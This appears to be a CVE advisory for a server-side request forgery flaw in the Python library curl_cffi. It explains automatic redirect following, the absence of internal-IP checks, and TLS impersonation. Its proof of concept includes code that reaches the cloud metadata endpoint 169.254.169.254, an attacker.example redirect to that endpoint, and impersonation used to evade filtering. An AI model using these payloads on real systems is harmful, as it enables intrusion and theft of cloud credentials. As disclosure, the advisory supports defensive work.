CVE-2026-33752

Description

### Summary curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl. Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi’s TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls. ### Details The issue comes from how curl_cffi handles outbound requests - User-supplied URLs are passed directly to libcurl without checking whether they resolve to internal IP ranges (e.g., 127.0.0.1, 169.254.0.0/16). - Redirects are automatically followed (CURLOPT_FOLLOWLOCATION = 1) inside libcurl. - There is no validation of redirect destinations at the Python layer. This means that even if an application only allows requests to external URLs, an attacker can - Provide a URL pointing to an attacker-controlled server - Return a redirect response pointing to an internal service - Have curl_cffi follow that redirect automatically As a result, internal endpoints (such as cloud instance metadata APIs) can be accessed. Additionally, curl_cffi supports TLS fingerprint impersonation (e.g., impersonate="chrome"). In environments where outbound requests are filtered based on TLS fingerprinting, this can make such requests harder to detect or block This behavior is similar to previously reported redirect-based SSRF issues such as CVE-2025-68616, where redirects allowed access to unintended internal resources. ### PoC 1. Direct internal request ``` import curl_cffi resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/") print(resp.text) ``` 2. Redirect to internal service Attacker server: ``` GET /test → 302 Location: http://169.254.169.254/latest/meta-data/ ``` Victim code: ``` import curl_cffi resp = curl_cffi.get("https://attacker.example/test") print(resp.text) ``` Result - Initial request goes to attacker server - Redirect is returned - libcurl follows the redirect automatically - Internal metadata endpoint is accessed 3. With TLS impersonation ``` import curl_cffi\ resp = curl_cffi.get( "https://attacker.example/test", impersonate="chrome") ``` In some environments, this may help the request bypass TLS-based filtering controls. ### Impact An attacker who can control the requested URL may be able to: - Access internal network services - Reach cloud metadata endpoints and retrieve sensitive information - Bypass certain outbound filtering mechanisms (depending on environment) This corresponds to CWE-918 Server-Side Request Forgery.

Priority Score